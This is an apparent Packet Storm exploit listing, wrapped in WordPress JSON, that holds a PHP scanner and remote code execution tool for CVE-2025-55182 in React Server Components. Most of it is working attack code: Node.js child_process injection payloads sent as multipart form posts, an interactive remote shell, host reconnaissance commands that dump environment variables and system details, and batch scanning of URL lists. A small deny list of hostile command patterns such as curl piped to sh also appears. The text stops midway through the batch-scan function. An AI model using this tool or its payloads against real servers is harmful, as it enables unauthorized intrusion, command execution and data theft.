{"id":29733,"date":"2025-12-09T12:37:33","date_gmt":"2025-12-09T12:37:33","guid":{"rendered":"http:\/\/localhost\/?p=29733"},"modified":"2025-12-09T12:37:33","modified_gmt":"2025-12-09T12:37:33","slug":"react-1920-php-scanner-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29733","title":{"rendered":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606"},"content":{"rendered":"

{“lastseen”:”2025-12-09T17:44:40″,”description”:”This project delivers a PHP-based vulnerability scanner and remote code execution exploit for CVE\u20112025\u201155182 affecting React Server Components. It leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212606″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55182″],”sourceData”:”=============================================================================================================================================\\n | # Title : React 19.2.0 PHP Scanner \\u0026 RCE Exploit Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/react.dev |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212444\/ \\u0026\\tCVE-2025-55182\\n \\n [+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVE\u20112025\u201155182 affecting React Server Components.\\n \\n [+] includes:\\n \\n Target scanning (single\/multiple hosts)\\n \\n Vulnerability detection\\n \\n RCE payload execution\\n \\n Interactive remote shell\\n \\n Structured JSON parsing with fallback\\n \\n Multipart form-data payload handling\\n \\n The exploit leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation.\\n \\n [+] POC : \\n \\n \\u003c?php\\n \/**\\n * by indoushka\\n *\/\\n \\n class CVE_2025_55182_Scanner_Secure {\\n \/\/ ANSI Color Codes with Windows fallback\\n private $colors = [];\\n \\n private $user_agent = ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’;\\n private $timeout = 10;\\n private $verify_ssl = false;\\n private $max_cmd_length = 200; \/\/ Maximum command length for safety\\n \\n public function __construct() {\\n \/\/ Initialize colors based on OS\\n $this-\\u003einit_colors();\\n \\n \/\/ Suppress SSL warnings\\n if (function_exists(‘stream_context_set_default’)) {\\n stream_context_set_default([\\n ‘ssl’ =\\u003e [\\n ‘verify_peer’ =\\u003e false,\\n ‘verify_peer_name’ =\\u003e false,\\n ]\\n ]);\\n }\\n }\\n \\n private function init_colors() {\\n \/\/ Check if we’re on Windows CMD without ANSI support\\n $is_windows = strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’;\\n $has_ansi_support = false;\\n \\n if ($is_windows \\u0026\\u0026 PHP_SAPI === ‘cli’) {\\n \/\/ Try to detect ANSI support in Windows 10+\\n $has_ansi_support = (function_exists(‘sapi_windows_vt100_support’) \\u0026\\u0026 sapi_windows_vt100_support(STDOUT))\\n || getenv(‘ANSICON’) !== false\\n || getenv(‘ConEmuANSI’) === ‘ON’\\n || getenv(‘TERM’) === ‘xterm’;\\n } elseif (!$is_windows) {\\n $has_ansi_support = true; \/\/ Unix-like systems usually support ANSI\\n }\\n \\n if ($has_ansi_support) {\\n $this-\\u003ecolors = [\\n ‘HEADER’ =\\u003e \\”\\\\033[95m\\”,\\n ‘BLUE’ =\\u003e \\”\\\\033[94m\\”,\\n ‘GREEN’ =\\u003e \\”\\\\033[92m\\”,\\n ‘WARNING’ =\\u003e \\”\\\\033[93m\\”,\\n ‘FAIL’ =\\u003e \\”\\\\033[91m\\”,\\n ‘ENDC’ =\\u003e \\”\\\\033[0m\\”,\\n ‘BOLD’ =\\u003e \\”\\\\033[1m\\”,\\n ‘CYAN’ =\\u003e \\”\\\\033[96m\\”,\\n ‘MAGENTA’ =\\u003e \\”\\\\033[95m\\”,\\n ‘BG_RED’ =\\u003e \\”\\\\033[41m\\”\\n ];\\n } else {\\n \/\/ No colors for unsupported terminals\\n $this-\\u003ecolors = array_fill_keys([\\n ‘HEADER’, ‘BLUE’, ‘GREEN’, ‘WARNING’, ‘FAIL’, \\n ‘ENDC’, ‘BOLD’, ‘CYAN’, ‘MAGENTA’, ‘BG_RED’\\n ], ”);\\n }\\n }\\n \\n private function color($name) {\\n return $this-\\u003ecolors[$name] ?? ”;\\n }\\n \\n private function print_info($msg) {\\n echo $this-\\u003ecolor(‘BLUE’) . \\”[*] \\” . $msg . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n private function print_success($msg) {\\n echo $this-\\u003ecolor(‘GREEN’) . \\”[+] \\” . $msg . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n private function print_error($msg) {\\n echo $this-\\u003ecolor(‘FAIL’) . \\”[-] \\” . $msg . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n private function print_warning($msg) {\\n echo $this-\\u003ecolor(‘WARNING’) . \\”[!] \\” . $msg . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n private function print_critical($msg) {\\n echo $this-\\u003ecolor(‘BG_RED’) . $this-\\u003ecolor(‘BOLD’) . \\”[CRITICAL] \\” . $msg . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n private function validate_command($cmd) {\\n \/\/ Check command length\\n if (strlen($cmd) \\u003e $this-\\u003emax_cmd_length) {\\n $this-\\u003eprint_error(\\”Command too long (max {$this-\\u003emax_cmd_length} characters)\\”);\\n return false;\\n }\\n \\n \/\/ Block potentially dangerous commands in interactive mode\\n $dangerous_patterns = [\\n ‘\/\\\\brm\\\\s+-rf\\\\b\/i’,\\n ‘\/\\\\bmkfs\\\\b\/i’,\\n ‘\/\\\\bdd\\\\s+if=\/i’,\\n ‘\/\\\\bchmod\\\\s+777\\\\b\/i’,\\n ‘\/\\\\bwget\\\\b.*\\\\|\\\\s*sh\/i’,\\n ‘\/\\\\bcurl\\\\b.*\\\\|\\\\s*sh\/i’,\\n ‘\/;.*;\/’, \/\/ Multiple command separators\\n ‘\/`.*`\/’, \/\/ Backticks\\n ‘\/\\\\$\\\\s*\\\\(\/’, \/\/ $() syntax\\n ‘\/\\\\|\\\\s*\\\\{\/’, \/\/ Pipe to block\\n ];\\n \\n foreach ($dangerous_patterns as $pattern) {\\n if (preg_match($pattern, $cmd)) {\\n $this-\\u003eprint_warning(\\”Potentially dangerous command detected and blocked\\”);\\n return false;\\n }\\n }\\n \\n return true;\\n }\\n \\n private function sanitize_command($cmd) {\\n \/\/ Basic sanitization for different command types\\n $cmd = trim($cmd);\\n \\n \/\/ Handle echo commands specially – remove quotes if present\\n if (preg_match(‘\/^echo\\\\s+\/i’, $cmd)) {\\n \/\/ Extract the part after echo\\n $echo_content = substr($cmd, 5);\\n $echo_content = trim($echo_content, \\” \\\\t\\\\n\\\\r\\\\0\\\\x0B\\\\\\”‘\\”);\\n \\n \/\/ Only allow safe characters for echo\\n $echo_content = preg_replace(‘\/[^\\\\w\\\\d\\\\s\\\\-_\\\\.]\/’, ”, $echo_content);\\n \\n return ‘echo ‘ . $echo_content;\\n }\\n \\n \/\/ For other commands, allow more characters but still sanitize\\n $cmd = preg_replace(‘\/[^\\\\w\\\\d\\\\s\\\\-_\\\\.\\\\\/\\\\\\\\\\\\,:;\\u0026|\\u003e\\u003c=\\\\[\\\\]{}()@#!~`\\\\$\\\\+\\\\-\\\\*\\”\\\\’?]\/’, ”, $cmd);\\n \\n \/\/ Limit consecutive special characters\\n $cmd = preg_replace(‘\/([;\\u0026|])\\\\1+\/’, ‘$1’, $cmd);\\n \\n return $cmd;\\n }\\n \\n private function build_payload($cmd) {\\n \/\/ Multiple payload variations for different environments\\n $payloads = [\\n \/\/ Primary payload – standard Node.js RCE\\n [\\n \\”id\\” =\\u003e \\”vm#runInThisContext\\”,\\n \\”bound\\” =\\u003e [\\”console.log(‘RCE_TEST’); process.mainModule.require(‘child_process’).execSync(‘{$cmd}’).toString()\\”]\\n ],\\n \\n \/\/ Alternative payload 1 – Different context\\n [\\n \\”id\\” =\\u003e \\”vm#runInNewContext\\”,\\n \\”bound\\” =\\u003e [\\”global.process.mainModule.require(‘child_process’).execSync(‘{$cmd}’).toString()\\”]\\n ],\\n \\n \/\/ Alternative payload 2 – Using module constructor\\n [\\n \\”id\\” =\\u003e \\”module#constructor\\”,\\n \\”bound\\” =\\u003e [\\”new module.constructor(‘return process’)().mainModule.require(‘child_process’).execSync(‘{$cmd}’).toString()\\”]\\n ],\\n \\n \/\/ Alternative payload 3 – Direct require\\n [\\n \\”id\\” =\\u003e \\”global#require\\”,\\n \\”bound\\” =\\u003e [\\”global.require(‘child_process’).execSync(‘{$cmd}’).toString()\\”]\\n ]\\n ];\\n \\n \/\/ Return the primary payload (can be modified to try all)\\n return json_encode($payloads[0]);\\n }\\n \\n private function send_payload($url, $cmd, $payload_variant = 0) {\\n \/\/ Validate command first\\n if (!$this-\\u003evalidate_command($cmd)) {\\n return [\\n ‘content’ =\\u003e null,\\n ‘headers’ =\\u003e [],\\n ‘status’ =\\u003e 0,\\n ‘success’ =\\u003e false,\\n ‘error’ =\\u003e ‘Command validation failed’\\n ];\\n }\\n \\n \/\/ Sanitize command\\n $safe_cmd = $this-\\u003esanitize_command($cmd);\\n \\n \/\/ Build payload based on variant\\n $payload = $this-\\u003ebuild_payload($safe_cmd);\\n \\n \/\/ Prepare multipart form data\\n $boundary = ‘—-WebKitFormBoundary’ . bin2hex(random_bytes(16));\\n $content = \\”–{$boundary}\\\\r\\\\n\\”;\\n $content .= \\”Content-Disposition: form-data; name=\\\\\\”\\\\$ACTION_REF_0\\\\\\”\\\\r\\\\n\\\\r\\\\n1\\\\r\\\\n\\”;\\n $content .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $content .= \\”Content-Disposition: form-data; name=\\\\\\”\\\\$ACTION_0:0\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $content .= $payload . \\”\\\\r\\\\n\\”;\\n $content .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $headers = [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”User-Agent: {$this-\\u003euser_agent}\\”,\\n \\”Accept: *\/*\\”,\\n \\”Connection: close\\”,\\n \\”X-Requested-With: XMLHttpRequest\\”,\\n \\”Origin: \\” . parse_url($url, PHP_URL_SCHEME) . \\”:\/\/\\” . parse_url($url, PHP_URL_HOST)\\n ];\\n \\n $context = stream_context_create([\\n ‘http’ =\\u003e [\\n ‘method’ =\\u003e ‘POST’,\\n ‘header’ =\\u003e implode(\\”\\\\r\\\\n\\”, $headers),\\n ‘content’ =\\u003e $content,\\n ‘timeout’ =\\u003e $this-\\u003etimeout,\\n ‘ignore_errors’ =\\u003e true\\n ],\\n ‘ssl’ =\\u003e [\\n ‘verify_peer’ =\\u003e $this-\\u003everify_ssl,\\n ‘verify_peer_name’ =\\u003e $this-\\u003everify_ssl\\n ]\\n ]);\\n \\n try {\\n $start_time = microtime(true);\\n $response = @file_get_contents($url, false, $context);\\n $response_time = round((microtime(true) – $start_time) * 1000, 2);\\n \\n $http_response_header = $http_response_header ?? [];\\n \\n return [\\n ‘content’ =\\u003e $response,\\n ‘headers’ =\\u003e $http_response_header,\\n ‘status’ =\\u003e $this-\\u003eget_http_status($http_response_header),\\n ‘success’ =\\u003e $response !== false,\\n ‘response_time’ =\\u003e $response_time,\\n ‘payload_variant’ =\\u003e $payload_variant,\\n ‘error’ =\\u003e $response === false ? error_get_last()[‘message’] ?? ‘Unknown error’ : null\\n ];\\n } catch (Exception $e) {\\n $this-\\u003eprint_error(\\”Connection error: \\” . $e-\\u003egetMessage());\\n return [\\n ‘content’ =\\u003e null,\\n ‘headers’ =\\u003e [],\\n ‘status’ =\\u003e 0,\\n ‘success’ =\\u003e false,\\n ‘response_time’ =\\u003e 0,\\n ‘error’ =\\u003e $e-\\u003egetMessage()\\n ];\\n }\\n }\\n \\n private function get_http_status($headers) {\\n if (empty($headers)) return 0;\\n \\n $status_line = $headers[0];\\n preg_match(‘\/HTTP\\\\\/\\\\d\\\\.\\\\d\\\\s+(\\\\d+)\/’, $status_line, $matches);\\n \\n return isset($matches[1]) ? (int)$matches[1] : 0;\\n }\\n \\n private function generate_token($length = 16) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $token = ”;\\n \\n for ($i = 0; $i \\u003c $length; $i++) {\\n $token .= $chars[random_int(0, strlen($chars) – 1)];\\n }\\n \\n return $token;\\n }\\n \\n private function extract_result_from_response($content, $token = null) {\\n $result = [\\n ‘type’ =\\u003e ‘unknown’,\\n ‘result’ =\\u003e null,\\n ‘error’ =\\u003e null,\\n ‘token_found’ =\\u003e false,\\n ‘json_valid’ =\\u003e false,\\n ‘raw_preview’ =\\u003e substr($content, 0, 200) . (strlen($content) \\u003e 200 ? ‘…’ : ”)\\n ];\\n \\n \/\/ Method 1: Try JSON parsing first\\n if (!empty($content)) {\\n $json_data = @json_decode($content, true);\\n \\n if (json_last_error() === JSON_ERROR_NONE) {\\n $result[‘json_valid’] = true;\\n $result[‘type’] = ‘json’;\\n $result[‘full_json’] = $json_data;\\n \\n if (isset($json_data[‘result’])) {\\n $result[‘result’] = $json_data[‘result’];\\n }\\n if (isset($json_data[‘error’])) {\\n $result[‘error’] = $json_data[‘error’];\\n }\\n if (isset($json_data[‘message’])) {\\n $result[‘error’] = $json_data[‘message’];\\n }\\n }\\n }\\n \\n \/\/ Method 2: Look for token in raw response\\n if ($token !== null \\u0026\\u0026 !empty($content)) {\\n if (strpos($content, $token) !== false) {\\n $result[‘token_found’] = true;\\n $result[‘type’] = $result[‘type’] === ‘unknown’ ? ‘raw’ : $result[‘type’];\\n \\n \/\/ Extract context around token\\n $pos = strpos($content, $token);\\n $start = max(0, $pos – 100);\\n $end = min(strlen($content), $pos + 100);\\n $context = substr($content, $start, $end – $start);\\n \\n if (empty($result[‘result’])) {\\n $result[‘result’] = $context;\\n }\\n }\\n }\\n \\n \/\/ Method 3: Try to extract from common patterns\\n if (empty($result[‘result’]) \\u0026\\u0026 !empty($content)) {\\n $patterns = [\\n ‘\/result[\\”\\\\’]?\\\\s*:\\\\s*[\\”\\\\’]?([^\\”\\\\’,}]+)\/i’,\\n ‘\/output[\\”\\\\’]?\\\\s*:\\\\s*[\\”\\\\’]?([^\\”\\\\’,}]+)\/i’,\\n ‘\/data[\\”\\\\’]?\\\\s*:\\\\s*[\\”\\\\’]?([^\\”\\\\’,}]+)\/i’,\\n ‘\/\\u003cpre[^\\u003e]*\\u003e([^\\u003c]+)\\u003c\\\\\/pre\\u003e\/i’,\\n ‘\/\\u003ccode[^\\u003e]*\\u003e([^\\u003c]+)\\u003c\\\\\/code\\u003e\/i’\\n ];\\n \\n foreach ($patterns as $pattern) {\\n if (preg_match($pattern, $content, $matches)) {\\n $result[‘result’] = trim($matches[1]);\\n $result[‘type’] = ‘pattern’;\\n break;\\n }\\n }\\n }\\n \\n return $result;\\n }\\n \\n public function scan($url, $detailed = false) {\\n $this-\\u003eprint_info(\\”Scanning {$url} for CVE-2025-55182…\\”);\\n \\n $token = $this-\\u003egenerate_token(16);\\n $cmd = \\”echo \\” . $token; \/\/ No quotes needed for echo\\n \\n $response = $this-\\u003esend_payload($url, $cmd);\\n \\n if (!$response[‘success’] || $response[‘content’] === null) {\\n $this-\\u003eprint_error(\\”Failed to connect to target.\\”);\\n $this-\\u003eprint_info(\\”Error: \\” . ($response[‘error’] ?? ‘Unknown’));\\n $this-\\u003eprint_info(\\”Response time: {$response[‘response_time’]}ms\\”);\\n return false;\\n }\\n \\n $content = $response[‘content’];\\n $analysis = $this-\\u003eextract_result_from_response($content, $token);\\n \\n if ($detailed) {\\n $this-\\u003eprint_info(\\”=== Detailed Analysis ===\\”);\\n $this-\\u003eprint_info(\\”Response type: \\” . $analysis[‘type’]);\\n $this-\\u003eprint_info(\\”HTTP Status: \\” . $response[‘status’]);\\n $this-\\u003eprint_info(\\”Response time: {$response[‘response_time’]}ms\\”);\\n $this-\\u003eprint_info(\\”JSON valid: \\” . ($analysis[‘json_valid’] ? ‘Yes’ : ‘No’));\\n $this-\\u003eprint_info(\\”Token found: \\” . ($analysis[‘token_found’] ? ‘Yes’ : ‘No’));\\n \\n if ($analysis[‘error’]) {\\n $this-\\u003eprint_warning(\\”Server error: \\” . $analysis[‘error’]);\\n }\\n }\\n \\n \/\/ Check for vulnerability\\n $is_vulnerable = false;\\n $confidence = ‘low’;\\n \\n \/\/ High confidence: Token found in JSON result\\n if ($analysis[‘type’] === ‘json’ \\u0026\\u0026 $analysis[‘result’] \\u0026\\u0026 strpos($analysis[‘result’], $token) !== false) {\\n $is_vulnerable = true;\\n $confidence = ‘high’;\\n $this-\\u003eprint_success(\\”HIGH CONFIDENCE: Token found in JSON result\\”);\\n }\\n \/\/ Medium confidence: Token found in raw response\\n elseif ($analysis[‘token_found’]) {\\n $is_vulnerable = true;\\n $confidence = ‘medium’;\\n $this-\\u003eprint_success(\\”MEDIUM CONFIDENCE: Token found in raw response\\”);\\n }\\n \/\/ Low confidence: Response looks like RCE output but no token\\n elseif ($analysis[‘result’] \\u0026\\u0026 preg_match(‘\/\\\\b(root|admin|www-data|user)\\\\b\/i’, $analysis[‘result’])) {\\n $is_vulnerable = true;\\n $confidence = ‘low’;\\n $this-\\u003eprint_warning(\\”LOW CONFIDENCE: RCE-like output detected\\”);\\n }\\n \\n if ($is_vulnerable) {\\n $this-\\u003eprint_success(\\”Target appears to be VULNERABLE (confidence: {$confidence})!\\”);\\n \\n if ($analysis[‘result’]) {\\n $output = trim($analysis[‘result’]);\\n $output_preview = strlen($output) \\u003e 100 ? substr($output, 0, 100) . ‘…’ : $output;\\n $this-\\u003eprint_info(\\”Output preview: \\” . $output_preview);\\n }\\n \\n \/\/ Try to get more info if detailed scan\\n if ($detailed) {\\n $this-\\u003eprint_info(\\”Gathering system information…\\”);\\n $info_cmds = [\\n ‘whoami’ =\\u003e ‘Current user’,\\n ‘uname -a || ver’ =\\u003e ‘System info’,\\n ‘pwd’ =\\u003e ‘Current directory’,\\n ‘id || whoami \/all’ =\\u003e ‘User details’\\n ];\\n \\n foreach ($info_cmds as $cmd =\\u003e $desc) {\\n $resp = $this-\\u003esend_payload($url, $cmd);\\n if ($resp[‘success’] \\u0026\\u0026 $resp[‘content’]) {\\n $info = $this-\\u003eextract_result_from_response($resp[‘content’]);\\n if ($info[‘result’]) {\\n $clean_result = trim(preg_replace(‘\/\\\\s+\/’, ‘ ‘, $info[‘result’]));\\n $this-\\u003eprint_info(\\”{$desc}: \\” . substr($clean_result, 0, 80));\\n }\\n }\\n usleep(50000); \/\/ 50ms delay\\n }\\n }\\n \\n return [‘vulnerable’ =\\u003e true, ‘confidence’ =\\u003e $confidence];\\n } else {\\n $this-\\u003eprint_warning(\\”Target does not appear to be vulnerable.\\”);\\n if ($detailed) {\\n $this-\\u003eprint_info(\\”Response preview: \\” . $analysis[‘raw_preview’]);\\n }\\n return [‘vulnerable’ =\\u003e false, ‘confidence’ =\\u003e ‘none’];\\n }\\n }\\n \\n public function exploit($url) {\\n $this-\\u003eprint_critical(\\”=== EXPLOIT MODE ACTIVATED ===\\”);\\n $this-\\u003eprint_warning(\\”You are about to exploit a vulnerable system.\\”);\\n $this-\\u003eprint_warning(\\”Make sure you have proper authorization!\\”);\\n \\n \/\/ Initial scan with details\\n $scan_result = $this-\\u003escan($url, true);\\n \\n if (!$scan_result[‘vulnerable’]) {\\n $this-\\u003eprint_error(\\”Target is not vulnerable or confidence is too low.\\”);\\n $this-\\u003eprint_info(\\”Would you like to proceed anyway? (yes\/no): \\”);\\n $response = trim(fgets(STDIN));\\n \\n if (strtolower($response) !== ‘yes’) {\\n $this-\\u003eprint_info(\\”Exploit cancelled.\\”);\\n return;\\n }\\n \\n $this-\\u003eprint_warning(\\”Proceeding with low-confidence target…\\”);\\n }\\n \\n $this-\\u003eprint_success(\\”Starting interactive shell on {$url}\\”);\\n $this-\\u003eprint_info(\\”Type ‘help’ for available commands, ‘exit’ to quit.\\”);\\n \\n \/\/ Get initial system info\\n $sysinfo = $this-\\u003eget_system_info($url);\\n $user = $sysinfo[‘user’] ?? ‘unknown’;\\n $hostname = $sysinfo[‘hostname’] ?? ‘unknown’;\\n $platform = $sysinfo[‘platform’] ?? ‘unknown’;\\n \\n \/\/ Interactive shell loop\\n $command_history = [];\\n while (true) {\\n \/\/ Build prompt with colors\\n $prompt = $this-\\u003ecolor(‘GREEN’) . $user . \\”@\\” . $hostname . $this-\\u003ecolor(‘ENDC’) . \\n \\” [\\” . $this-\\u003ecolor(‘CYAN’) . $platform . $this-\\u003ecolor(‘ENDC’) . \\”] \\” .\\n $this-\\u003ecolor(‘BLUE’) . $this-\\u003ecolor(‘BOLD’) . \\”\\u003e \\” . $this-\\u003ecolor(‘ENDC’);\\n \\n echo $prompt;\\n \\n \/\/ Get command input\\n if (function_exists(‘readline’)) {\\n readline_completion_function(function($input, $index) {\\n $commands = [‘help’, ‘exit’, ‘clear’, ‘sysinfo’, ‘history’, ‘pwd’, ‘ls’, ‘cd’, ‘cat’, ‘whoami’, ‘id’];\\n return array_filter($commands, function($cmd) use ($input) {\\n return stripos($cmd, $input) === 0;\\n });\\n });\\n \\n $cmd = readline();\\n if ($cmd !== ”) {\\n readline_add_history($cmd);\\n $command_history[] = $cmd;\\n }\\n } else {\\n $cmd = trim(fgets(STDIN));\\n if (!empty($cmd)) {\\n $command_history[] = $cmd;\\n }\\n }\\n \\n \/\/ Handle exit\\n if (strtolower($cmd) === ‘exit’ || strtolower($cmd) === ‘quit’) {\\n $this-\\u003eprint_info(\\”Exiting interactive shell…\\”);\\n break;\\n }\\n \\n \/\/ Handle empty command\\n if (empty($cmd)) {\\n continue;\\n }\\n \\n \/\/ Handle special commands\\n switch (strtolower($cmd)) {\\n case ‘help’:\\n $this-\\u003eshow_help();\\n continue 2;\\n \\n case ‘clear’:\\n case ‘cls’:\\n system(strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’ ? ‘cls’ : ‘clear’);\\n continue 2;\\n \\n case ‘history’:\\n $this-\\u003eshow_history($command_history);\\n continue 2;\\n \\n case ‘sysinfo’:\\n $this-\\u003eshow_sysinfo($url);\\n continue 2;\\n \\n case ‘safe’:\\n $this-\\u003eprint_info(\\”Safe mode enabled – blocking dangerous commands\\”);\\n $this-\\u003eprint_info(\\”Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh\\”);\\n continue 2;\\n }\\n \\n \/\/ Validate command length\\n if (strlen($cmd) \\u003e $this-\\u003emax_cmd_length) {\\n $this-\\u003eprint_error(\\”Command too long (max {$this-\\u003emax_cmd_length} characters)\\”);\\n $this-\\u003eprint_info(\\”Tip: Use redirects or split complex commands\\”);\\n continue;\\n }\\n \\n \/\/ Execute command\\n $start_time = microtime(true);\\n $response = $this-\\u003esend_payload($url, $cmd);\\n $exec_time = round((microtime(true) – $start_time) * 1000, 2);\\n \\n if ($response[‘success’] \\u0026\\u0026 $response[‘content’]) {\\n $analysis = $this-\\u003eextract_result_from_response($response[‘content’]);\\n \\n if ($analysis[‘result’]) {\\n echo trim($analysis[‘result’]) . PHP_EOL;\\n $this-\\u003eprint_info(\\”Execution time: {$exec_time}ms | HTTP: {$response[‘status’]}\\”);\\n } elseif ($analysis[‘error’]) {\\n $this-\\u003eprint_error(\\”Server error: \\” . $analysis[‘error’]);\\n } else {\\n $this-\\u003eprint_warning(\\”Command executed but no output returned.\\”);\\n $this-\\u003eprint_info(\\”Response type: \\” . $analysis[‘type’]);\\n }\\n } else {\\n $this-\\u003eprint_error(\\”Command failed or no response.\\”);\\n $this-\\u003eprint_info(\\”Status: {$response[‘status’]} | Time: {$response[‘response_time’]}ms\\”);\\n if ($response[‘error’]) {\\n $this-\\u003eprint_info(\\”Error: \\” . $response[‘error’]);\\n }\\n }\\n \\n \/\/ Small delay to avoid overwhelming the target\\n usleep(100000); \/\/ 100ms\\n }\\n \\n $this-\\u003eprint_info(\\”Session ended. Total commands executed: \\” . count($command_history));\\n }\\n \\n private function get_system_info($url) {\\n $info = [\\n ‘user’ =\\u003e ‘unknown’,\\n ‘hostname’ =\\u003e ‘unknown’,\\n ‘platform’ =\\u003e ‘unknown’\\n ];\\n \\n \/\/ Try multiple commands to get info\\n $commands = [\\n ‘whoami’ =\\u003e ‘user’,\\n ‘hostname || hostname’ =\\u003e ‘hostname’,\\n ‘uname -s -r -m || ver || systeminfo | findstr \/B \/C:\\”OS\\”‘ =\\u003e ‘platform’\\n ];\\n \\n foreach ($commands as $cmd =\\u003e $key) {\\n $resp = $this-\\u003esend_payload($url, $cmd);\\n if ($resp[‘success’] \\u0026\\u0026 $resp[‘content’]) {\\n $analysis = $this-\\u003eextract_result_from_response($resp[‘content’]);\\n if ($analysis[‘result’]) {\\n $info[$key] = trim($analysis[‘result’]);\\n }\\n }\\n usleep(50000); \/\/ 50ms delay\\n }\\n \\n return $info;\\n }\\n \\n private function show_help() {\\n $help = [\\n ‘Basic Commands:’ =\\u003e [\\n ‘help’ =\\u003e ‘Show this help message’,\\n ‘exit, quit’ =\\u003e ‘Exit the interactive shell’,\\n ‘clear, cls’ =\\u003e ‘Clear the terminal screen’,\\n ‘history’ =\\u003e ‘Show command history’,\\n ‘sysinfo’ =\\u003e ‘Display detailed system information’,\\n ‘safe’ =\\u003e ‘Show safe mode restrictions’\\n ],\\n ‘File Operations:’ =\\u003e [\\n ‘pwd’ =\\u003e ‘Print working directory’,\\n ‘ls, ls -la, dir’ =\\u003e ‘List directory contents’,\\n ‘cat \\u003cfile\\u003e’ =\\u003e ‘View file contents’,\\n ‘cd \\u003cdir\\u003e’ =\\u003e ‘Change directory (note: may not persist)’\\n ],\\n ‘System Info:’ =\\u003e [\\n ‘whoami’ =\\u003e ‘Current user’,\\n ‘id’ =\\u003e ‘User ID and groups’,\\n ‘uname -a’ =\\u003e ‘System information’,\\n ‘ps aux’ =\\u003e ‘Running processes’,\\n ‘netstat -an’ =\\u003e ‘Network connections’\\n ],\\n ‘Tips:’ =\\u003e [\\n ‘Command chaining’ =\\u003e ‘Use \\u0026\\u0026 for sequential commands’,\\n ‘Output redirection’ =\\u003e ‘Use \\u003e to save output to file’,\\n ‘Pipes’ =\\u003e ‘Use | to chain commands’,\\n ‘Background jobs’ =\\u003e ‘Use \\u0026 to run in background’\\n ]\\n ];\\n \\n foreach ($help as $section =\\u003e $commands) {\\n $this-\\u003eprint_info(\\”\\\\n{$section}\\”);\\n foreach ($commands as $cmd =\\u003e $desc) {\\n echo \\” \\” . str_pad($cmd, 25) . \\” – \\” . $desc . PHP_EOL;\\n }\\n }\\n }\\n \\n private function show_history($history) {\\n if (empty($history)) {\\n $this-\\u003eprint_info(\\”No command history yet.\\”);\\n return;\\n }\\n \\n $this-\\u003eprint_info(\\”Command History:\\”);\\n foreach ($history as $index =\\u003e $cmd) {\\n echo \\” [\\” . ($index + 1) . \\”] \\” . $cmd . PHP_EOL;\\n }\\n }\\n \\n private function show_sysinfo($url) {\\n $this-\\u003eprint_info(\\”Gathering detailed system information…\\”);\\n \\n $checks = [\\n ‘System’ =\\u003e ‘uname -a || ver’,\\n ‘Kernel’ =\\u003e ‘cat \/proc\/version 2\\u003e\/dev\/null || systeminfo | findstr \/B \/C:\\”OS\\”‘,\\n ‘CPU’ =\\u003e ‘cat \/proc\/cpuinfo 2\\u003e\/dev\/null || wmic cpu get name’,\\n ‘Memory’ =\\u003e ‘free -h 2\\u003e\/dev\/null || wmic memorychip get capacity’,\\n ‘Disk’ =\\u003e ‘df -h 2\\u003e\/dev\/null || wmic logicaldisk get size,freespace,caption’,\\n ‘Network’ =\\u003e ‘ifconfig 2\\u003e\/dev\/null || ipconfig \/all’,\\n ‘Users’ =\\u003e ‘who 2\\u003e\/dev\/null || query user’,\\n ‘Processes’ =\\u003e ‘ps aux | head -20 2\\u003e\/dev\/null || tasklist’,\\n ‘Environment’ =\\u003e ‘env 2\\u003e\/dev\/null || set’,\\n ‘Packages’ =\\u003e ‘dpkg -l 2\\u003e\/dev\/null || rpm -qa 2\\u003e\/dev\/null || pacman -Q’\\n ];\\n \\n foreach ($checks as $name =\\u003e $cmd) {\\n $resp = $this-\\u003esend_payload($url, $cmd);\\n if ($resp[‘success’] \\u0026\\u0026 $resp[‘content’]) {\\n $analysis = $this-\\u003eextract_result_from_response($resp[‘content’]);\\n if ($analysis[‘result’]) {\\n $output = trim($analysis[‘result’]);\\n $preview = substr($output, 0, 100);\\n $this-\\u003eprint_info(\\”{$name}: \\” . $preview . (strlen($output) \\u003e 100 ? ‘…’ : ”));\\n }\\n }\\n usleep(100000); \/\/ 100ms delay\\n }\\n }\\n \\n public function batch_scan($file_path, $output_report = true) {\\n if (!file_exists($file_path)) {\\n $this-\\u003eprint_error(\\”File not found: {$file_path}\\”);\\n return;\\n }\\n \\n $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n \\n if (!$urls) {\\n $this-\\u003eprint_error(\\”No URLs found in file.\\”);\\n return;\\n }\\n \\n $this-\\u003eprint_info(\\”Loaded \\” . count($urls) . \\” URLs from {$file_path}\\”);\\n $this-\\u003eprint_warning(\\”Batch scan starting. This may take a while…\\”);\\n \\n $results = [\\n ‘high_confidence’ =\\u003e [],\\n ‘medium_confidence’ =\\u003e [],\\n ‘low_confidence’ 